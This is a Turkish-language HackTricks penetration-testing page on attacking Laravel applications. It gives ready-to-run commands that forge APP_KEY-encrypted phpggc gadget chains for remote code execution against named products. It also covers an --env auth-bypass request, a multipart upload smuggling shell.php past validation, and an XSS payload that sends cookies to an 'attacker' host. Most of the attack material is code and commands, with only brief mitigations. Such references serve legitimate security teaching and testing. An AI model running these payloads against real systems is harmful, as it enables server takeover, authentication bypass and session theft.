Laravel

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE) Azure Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

• abonelik planlarını kontrol edin!
• 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter’da bizi takip edin 🐦 @hacktricks_live.**
• Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

Laravel SQLInjection

Detaylı bilgi için şuraya bakın: https://stitcher.io/blog/unsafe-sql-functions-in-laravel

APP_KEY & Şifreleme iç işleyişi (Laravel >=5.6)

Laravel arka planda HMAC bütünlüğü ile AES-256-CBC (veya GCM) kullanır (Illuminate\Encryption\Encrypter). Nihai olarak istemciye gönderilen ham şifreli metin şu şekilde bir Base64 of a JSON object’tir, örneğin:

{
"iv"   : "Base64(random 16-byte IV)",
"value": "Base64(ciphertext)",
"mac"  : "HMAC_SHA256(iv||value, APP_KEY)",
"tag"  : ""                 // only used for AEAD ciphers (GCM)
}

encrypt($value, $serialize=true) varsayılan olarak düz metni serialize() eder, oysa decrypt($payload, $unserialize=true) şifre çözülmüş değeri otomatik olarak unserialize() eder. Bu nedenle 32 baytlık gizli APP_KEY’i bilen herhangi bir saldırgan, şifrelenmiş bir PHP serialized object oluşturup sihirli yöntemler (__wakeup, __destruct, …) aracılığıyla RCE elde edebilir.

Minimal PoC (framework ≥9.x):

use Illuminate\Support\Facades\Crypt;

$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
$evil  = Crypt::encrypt($chain);            // JSON->Base64 cipher ready to paste

Üretilen string’i herhangi bir zayıf decrypt() sink’ine (route param, cookie, session, …) inject edin.

laravel-crypto-killer 🧨

laravel-crypto-killer tüm süreci otomatikleştirir ve kullanışlı bir bruteforce modu ekler:

# Encrypt a phpggc chain with a known APP_KEY
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"

# Decrypt a captured cookie / token
laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>

# Try a word-list of keys against a token (offline)
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt

Betik, hem CBC hem GCM payload’larını şeffaf şekilde destekler ve HMAC/tag alanını yeniden oluşturur.

Gerçek dünyadaki zafiyetli desenler

İstismar iş akışı her zaman şu şekildedir:

1. 32-byte APP_KEY’i elde edin veya brute-force ile kırın.
2. PHPGGC ile bir gadget chain oluşturun (örneğin Laravel/RCE13, Laravel/RCE9 veya Laravel/RCE15).
3. Serileştirilmiş gadget’ı laravel_crypto_killer.py ve elde edilen APP_KEY ile şifreleyin.
4. Şifrelenmiş ciphertext’i zafiyetli decrypt() sink’ine (route parameter, cookie, session …) teslim ederek RCE tetikleyin.

Aşağıda, yukarıda bahsedilen her gerçek dünya CVE’si için tam saldırı yolunu gösteren kısa tek satırlık örnekler bulunmaktadır:

# Invoice Ninja ≤5 – /route/{hash}
php8.2 phpggc Laravel/RCE13 system id -b -f | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - | \
xargs -I% curl "https://victim/route/%"

# Snipe-IT ≤6 – XSRF-TOKEN cookie
php7.4 phpggc Laravel/RCE9 system id -b | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - > xsrf.txt
curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login

# Crater – cookie-based session
php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login

Mass APP_KEY discovery via cookie brute-force

Çünkü her yeni Laravel yanıtı en az 1 şifreli cookie (XSRF-TOKEN ve genellikle laravel_session) ayarlar, public internet scanners (Shodan, Censys, …) leak millions of ciphertexts ve bunlar offline olarak saldırıya açık hale gelir.

Synacktiv tarafından yayınlanan araştırmanın ana bulguları (2024-2025):

• Dataset July 2024 » 580 k tokens, 3.99 % keys cracked (≈23 k)
• Dataset May 2025 » 625 k tokens, 3.56 % keys cracked

• 1 000 sunucu hâlâ legacy CVE-2018-15133’e karşı savunmasız çünkü tokens doğrudan serileştirilmiş veri içeriyor.

• Geniş anahtar yeniden kullanımı – Top-10 APP_KEYs, ticari Laravel şablonlarıyla gelen hard-coded varsayılanlardır (UltimatePOS, Invoice Ninja, XPanel, …).

Özel Go aracı nounours, AES-CBC/GCM bruteforce throughput’unu ~1.5 billion tries/s seviyesine çıkararak tüm dataset’in kırılmasını <2 dakikaya indiriyor.

CVE-2024-52301 – HTTP argv/env override → auth bypass

PHP’de register_argc_argv=On (birçok distroda tipik) olduğunda, PHP query string’den türetilen HTTP istekleri için bir argv dizisi açığa çıkarır. Yeni Laravel sürümleri bu “CLI-like” argümanları parse edip runtime’da --env=<value>’yi dikkate aldı. Bu, herhangi bir URL’ye ekleyerek mevcut HTTP isteği için framework ortamını değiştirmeye olanak tanır:

• Quick check:

• https://target/?--env=local adresini veya herhangi bir string’i ziyaret edin ve ortam-bağımlı değişiklikleri (debug banner’ları, altbilgiler, ayrıntılı hata mesajları) arayın. Eğer string yansıtılıyorsa, override çalışıyor demektir.

• Etki örneği (business logic trusting a special env):

• Eğer uygulamada if (app()->environment('preprod')) { /* bypass auth */ } gibi dallanmalar varsa, geçerli kimlik bilgilerine gerek duymadan kimlik doğrulayabilirsiniz; login POST’unu şu şekilde gönderin:

• POST /login?--env=preprod

• Notlar:

• İstek başına çalışır, kalıcı değildir.

• register_argc_argv=On olması ve HTTP için argv okuyan bir Laravel sürümü gerektirir.

• “debug” ortamlarında daha ayrıntılı hata mesajlarını ortaya çıkarmak veya ortama bağlı kod yollarını tetiklemek için kullanışlı bir primitive’dir.

• Mitigations:

• PHP-FPM/Apache için register_argc_argv’yi devre dışı bırakın.

• Laravel’i HTTP isteklerinde argv’yi yok sayacak şekilde güncelleyin ve production route’larda app()->environment()’e dayanan güven varsayımlarını kaldırın.

Minimal exploitation flow (Burp):

POST /login?--env=preprod HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded
...
email=a@b.c&password=whatever&remember=0xdf

CVE-2025-27515 – Wildcard file validation bypass (files.*)

Laravel 10.0–10.48.28, 11.0.0–11.44.0 and 12.0.0–12.1.0, hazırlanmış multipart isteklerin files.* / images.*’e bağlı herhangi bir kuralı tamamen atlamasına izin veriyordu. Wildcard anahtarları genişleten parser, saldırgan tarafından kontrol edilen placeholder’larla (ör. __asterisk__ segmentlerini önceden doldurma) karıştırılabiliyor; bu yüzden framework, image, mimes, dimensions, max gibi doğrulamaları hiç çalıştırmadan UploadedFile nesnelerini hydrate ediyordu. Kötü amaçlı bir blob Storage::putFile* içine düştüğünde, HackTricks’te zaten listelenmiş dosya-yükleme primitiflerine (web shells, log poisoning, signed job deserialization, …) pivot yapabilirsiniz.

Deseni arama

• Static: rg -n "files\\.\*" -g"*.php" app/ veya FormRequest sınıflarını, rules()’ün files.* içeren diziler döndürüp döndürmediğini inceleyin.
• Dynamic: ön üretim ortamında Xdebug veya Laravel Telescope kullanarak Illuminate\Validation\Validator::validate()’i hook’layın ve zafiyete takılan her isteği loglayın.
• Middleware/route incelemesi: birden fazla dosya kabul eden endpoint’ler (avatar importers, document portals, drag-n-drop components) genelde files.*’e güvenme eğilimindedir.

Pratik istismar iş akışı

1. Meşru bir upload’u yakalayın ve Burp Repeater’da tekrar oynatın.
2. Aynı part’ı çoğaltın ama alan adını değiştirip placeholder token’larını önceden içerir hâle getirin (ör. files[0][__asterisk__payload]) veya başka bir dizi içine yerleştirin (files[0][alt][0]). Zayıf build’lerde, bu ikinci part hiç doğrulanmaz ama yine de bir UploadedFile girdisi olur.
3. Sahte dosyayı bir PHP payload’a (shell.php, .phar, polyglot) yönlendirin ve uygulamayı bunu web erişilebilir bir diske kaydetmeye zorlayın (genellikle public/, php artisan storage:link etkinleştirildiğinde).

curl -sk https://target/upload \
-F 'files[0]=@ok.png;type=image/png' \
-F 'files[0][__asterisk__payload]=@shell.php;type=text/plain' \
-F 'description=lorem'

Keep fuzzing key names (files.__dot__0, files[0][0], files[0][uuid] …) until you find one that bypasses the validator but still gets written to disk; patched versions reject these crafted attribute names immediately.

Zincirleme yapılabilecek ekosistem paket zafiyetleri (2025)

CVE-2025-47275 – Auth0-PHP CookieStore tag brute-force (affects auth0/laravel-auth0)

Proje varsayılan CookieStore backend ile Auth0 login kullanıyorsa ve auth0/auth0-php < 8.14.0 ise, auth0 session cookie üzerindeki GCM tag’i offline olarak brute-force edilebilecek kadar kısadır. Bir cookie yakalayın, JSON payload’u değiştirin (ör. "sub":"auth0|admin" ve app_metadata.roles ayarlayın), tag’i brute-force edin ve tekrar oynatarak geçerli bir Laravel guard oturumu elde edin. Hızlı kontroller: composer.lock içinde auth0/auth0-php <8.14.0 görünmesi ve .env içinde AUTH0_SESSION_STORAGE=cookie olması.

CVE-2025-48490 – lomkit/laravel-rest-api doğrulama geçersiz kılma

lomkit/laravel-rest-api paketi 2.13.0 öncesinde action başına tanımlanan kuralları hatalı bir şekilde birleştirir: aynı attribute için sonraki tanımlar önceki tanımları override eder, bu da crafted alanların doğrulamayı atlamasına izin verir (ör. bir update action sırasında filter kurallarını overwrite etmek), sonucunda mass assignment veya doğrulanmamış SQL-ish filtrelere yol açar. Pratik kontroller:

• composer.lock lomkit/laravel-rest-api <2.13.0 gösteriyor.
• /_rest/users?filters[0][column]=password&filters[0][operator]== reddedilmesi gerekirken kabul ediliyorsa, bu filter doğrulamasının atlandığını gösterir.

Laravel Taktikleri

Hata ayıklama modu

Eğer Laravel hata ayıklama modunda ise koda ve hassas verilere erişebileceksiniz.
Örneğin http://127.0.0.1:8000/profiles:

Bu genellikle diğer Laravel RCE CVE’lerini exploit etmek için gerekir.

CVE-2024-13918 / CVE-2024-13919 – Whoops debug sayfalarında reflected XSS

• Etkilenenler: Laravel 11.9.0–11.35.1 ve APP_DEBUG=true (global olarak veya CVE-2024-52301 gibi yanlış yapılandırılmış env override’ları ile zorlanmış olabilir).
• Temel: Whoops tarafından render edilen yakalanmamış her istisna, isteğin/rota’nın bazı bölümlerini HTML kodlaması olmadan echo’lar; bu yüzden bir rota veya istek parametresine <img src> / <script> enjekte etmek, kimlik doğrulamadan önce response üzerinde stored-on-response XSS’e yol açar.
• Etki: XSRF-TOKEN çalmak, secret’larla birlikte stack traces’i leak etmek, hedef oturumlarda _ignition/execute-solution’a tarayıcı tabanlı pivot açmak veya çerezlere dayanan passwordless dashboard’larla zincirlemek.

Minimal PoC:

// blade/web.php (attacker-controlled param reflected)
Route::get('/boom/{id}', function ($id) {
abort(500);
});

curl -sk "https://target/boom/%3Cscript%3Efetch('//attacker/x?c='+document.cookie)%3C/script%3E"

Hata ayıklama modu normalde kapalı olsa bile, arka plan işleri veya kuyruk worker’ları aracılığıyla bir hata zorlamak ve _ignition/health-check endpoint’ini sorgulamak genellikle bu zinciri hâlâ açığa çıkaran staging sunucularını ortaya çıkarır.

Parmak izi alma ve açığa çıkmış geliştirme endpoint’leri

Hızlı kontrollerle bir Laravel yığını ve üretimde açığa çıkmış tehlikeli geliştirme araçlarını tespit etmek:

• /_ignition/health-check → Ignition mevcut (debug tool used by CVE-2021-3129). Eğer kimlik doğrulamasız erişilebiliyorsa, uygulama debug modunda veya yanlış yapılandırılmış olabilir.
• /_debugbar → Laravel Debugbar varlıkları; genellikle debug modunu gösterir.
• /telescope → Laravel Telescope (geliştirme monitörü). Eğer herkese açıksa, kapsamlı bilgi sızıntısı ve olası eylemler beklenir.
• /horizon → Kuyruk panosu; sürüm açıklaması ve bazen CSRF korumalı eylemler.
• X-Powered-By, çerezler XSRF-TOKEN ve laravel_session, ayrıca Blade hata sayfaları da parmak izi almaya yardımcı olur.

# Nuclei quick probe
nuclei -nt -u https://target -tags laravel -rl 30
# Manual spot checks
for p in _ignition/health-check _debugbar telescope horizon; do curl -sk https://target/$p | head -n1; done

.env

Laravel, çerezleri şifrelemek ve diğer kimlik bilgilerini kullanmak için kullandığı APP’i .env adlı bir dosyada saklar; bu dosyaya /../.env altında bazı path traversal yoluyla erişilebilir.

Laravel bu bilgiyi, bir hata oluştuğunda ve debug etkinleştirildiğinde görünen debug sayfasında da gösterir.

Using the secret APP_KEY of Laravel you can decrypt and re-encrypt cookies:

Decrypt Cookie

</details>

### Laravel Deserialization RCE

Zayıf sürümler: 5.5.40 ve 5.6.x ile 5.6.29 arasındaki sürümler ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))

Deserialization vulnerability hakkında bilgi için şuraya bakabilirsiniz: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)

Bunu şu repo ile test edip exploit edebilirsiniz: [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
Veya metasploit ile de exploit edebilirsiniz: `use unix/http/laravel_token_unserialize_exec`

### CVE-2021-3129

Başka bir deserialization: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)



## Referanslar
* [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [Laravel : analyse de fuite d’APP_KEY (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
* [CVE-2024-52301 advisory – Laravel argv env detection](https://github.com/advisories/GHSA-gv7v-rgg6-548h)
* [CVE-2024-52301 PoC – register_argc_argv HTTP argv → --env override](https://github.com/Nyamort/CVE-2024-52301)
* [0xdf – HTB Environment (CVE‑2024‑52301 env override → auth bypass)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
* [GHSA-78fx-h6xr-vch4 – Laravel wildcard file validation bypass (CVE-2025-27515)](https://github.com/laravel/framework/security/advisories/GHSA-78fx-h6xr-vch4)
* [SBA Research – CVE-2024-13919 reflected XSS in debug-mode error page](http://www.openwall.com/lists/oss-security/2025/03/10/4)
* [CVE-2025-47275 – Auth0-PHP CookieStore tag brute-force (laravel-auth0)](https://www.wiz.io/vulnerability-database/cve/cve-2025-47275)
* [CVE-2025-48490 – lomkit/laravel-rest-api validation override](https://advisories.gitlab.com/pkg/composer/lomkit/laravel-rest-api/CVE-2025-48490/)


> [!TIP]
> AWS Hacking'i öğrenin ve pratik yapın:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> GCP Hacking'i öğrenin ve pratik yapın: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Azure Hacking'i öğrenin ve pratik yapın: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>HackTricks'i Destekleyin</summary>
>
> - [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
> - **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** bizi **takip edin** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
>
> </details>